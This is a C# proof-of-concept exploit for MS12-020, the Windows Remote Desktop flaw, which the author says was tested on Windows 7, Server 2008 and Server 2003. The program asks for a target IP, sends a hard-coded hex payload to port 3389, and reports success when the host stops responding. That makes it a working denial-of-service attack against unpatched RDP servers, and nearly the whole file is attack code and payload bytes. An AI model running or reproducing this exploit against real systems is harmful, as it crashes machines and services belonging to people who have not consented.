//ms12-020 "chinese shit" PoC //Tested On Win7 Ultimate & Win 2008 Server & Win 2003 Serrver R2 //C# Coded By Yomi :D using System; using System.Net; using System.Net.Sockets; namespace RDP_PoC_Exploit { class Program { public static readonly string str_shell = "030000130ee00000" +"0000000100080000" +"000000030001d602" +"f0807f6582019404" +"01010401010101ff" +"3019020400000000" + "0204000000020204" +"0000000002040000" +"0001020400000000" +"0204000000010202" +"ffff020400000002" +"3019020400000001" + "0204000000010204" +"0000000102040000" +"0001020400000000" +"0204000000010202" +"0420020400000002" +"301c0202ffff0202" + "fc170202ffff0204" +"0000000102040000" +"0000020400000001" +"0202ffff02040000" +"0002048201330005" +"00147c0001812a00" + "0800100001c00044" +"756361811c01c0d8" +"00040008008002e0" +"0101ca03aa090400" +"00ce0e000048004f" +"0053005400000000" + "0000000000000000" +"0000000000000000" +"0000000000040000" +"00000000000c0000" +"0000000000000000" +"0000000000000000" + "0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" + "0001ca0100000000" +"0010000700010030" +"0030003000300030" +"002d003000300030" +"002d003000300030" +"0030003000300030" + "002d003000300030" +"0030003000000000" +"0000000000000000" +"0000000000000000" +"000000000004c00c" +"000d000000000000" + "0002c00c001b0000" +"000000000003c02c" +"0003000000726470" +"6472000000000080" +"80636c6970726472" +"000000a0c0726470" + "736e640000000000" +"c00300000c02f080" +"0401000100030000" +"0802f08028030000" +"0c02f08038000603" +"ef0300000c02f080" + "38000603eb030000" +"0c02f08038000603" +"ec0300000c02f080" +"38000603ed030000" +"0c02f08038000603" +"ee0300000b06d000" + "00123400"; static void Main(string[] args) { Console.WriteLine("Enter Remote IP : <192.168.1.1> <Enter To Start :D>"); string str_IP = Console.ReadLine(); Exploit_it(str_IP); } static private void Exploit_it(string IP) { try { Socket _soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP); IPAddress remoteIPAddress = IPAddress.Parse(IP); IPEndPoint remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389); _soc.Connect(remoteEndPoint); Console.WriteLine(".............. Creating Paylod "); byte[] buff = HexString2Bytes(str_shell); Console.WriteLine(".............. Sending Payload "); _soc.Send(buff); Console.WriteLine(".............. Payoad Sent ! "); Console.WriteLine(".............. Reconnecting To Remote Target ! "); _soc.Disconnect(true); try { Socket re_soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP); IPAddress re_remoteIPAddress = IPAddress.Parse(IP); IPEndPoint re_remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389); re_soc.Connect(re_remoteEndPoint); Console.WriteLine(".............. Remote Host Responding ! :( "); Console.WriteLine(".............. Exploit Faild ! :( "); } catch (System.Net.Sockets.SocketException Exp) { Console.WriteLine(".............. Remote Host Not Response ! :D"); Console.WriteLine(".............. Exploit Success !! \r\nSocket Error : [ " + Exp.Message + " ]"); } Console.WriteLine(".............. Exploit Done ! \r\n.............. Check Result Of It !"); } catch (System.Net.Sockets.SocketException se) { Console.WriteLine(".............. Exploit Faild !"); Console.WriteLine("Socket Error : [ " + se.Message + " ]"); } } static private byte[] HexString2Bytes(string hexString) { int len = hexString.Length; if (len % 2 == 1) throw new Exception("Invalid HEX String Length !"); int len_half = len / 2; byte[] arr_b = new byte[len_half]; for (int i = 0; i != len_half; i++) { arr_b[i] = (byte)Int32.Parse(hexString.Substring(i * 2, 2), System.Globalization.NumberStyles.HexNumber); } return arr_b; } } }